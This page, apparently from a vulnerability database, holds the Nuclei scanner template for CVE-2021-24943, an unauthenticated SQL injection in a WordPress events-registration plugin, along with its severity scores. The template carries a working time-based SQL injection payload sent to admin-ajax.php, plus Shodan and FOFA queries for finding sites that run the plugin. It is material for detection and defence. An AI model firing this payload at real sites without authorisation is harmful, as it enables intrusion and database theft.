Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-24943
HistoryFeb 13, 2024 - 4:03 a.m.

Registrations for the Events Calendar < 2.7.6 - SQL Injection

2024-02-1304:03:42
ProjectDiscovery
github.com
18
wordpress
sql injection
vulnerability
unauthenticated
cwe-89
security plugin

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.31 Low

EPSS

Percentile

97.0%

The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.
id: CVE-2021-24943

info:
  name: Registrations for the Events Calendar < 2.7.6 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.
  remediation: Fixed in 2.7.6
  reference:
    - https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24943
    - https://wordpress.org/plugins/registrations-for-the-events-calendar/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24943
    cwe-id: CWE-89
    epss-score: 0.20551
    epss-percentile: 0.96367
    cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: roundupwp
    product: registrations_for_the_events_calendar
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/
    fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/
    publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/"
  tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp
variables:
  text: "{{rand_base(5)}}"

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(body, "Please enter the email you registered with")'
        condition: and
# digest: 4b0a00483046022100baf26aa77d293a650d638df6fa36214c0344ec2c80457d29c0cec194f81aa415022100ab4c0c9979d914df0d42b4b1c65aae34aff3194e9127bdf1aa5c9d1fed8fdf11:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.31 Low

EPSS

Percentile

97.0%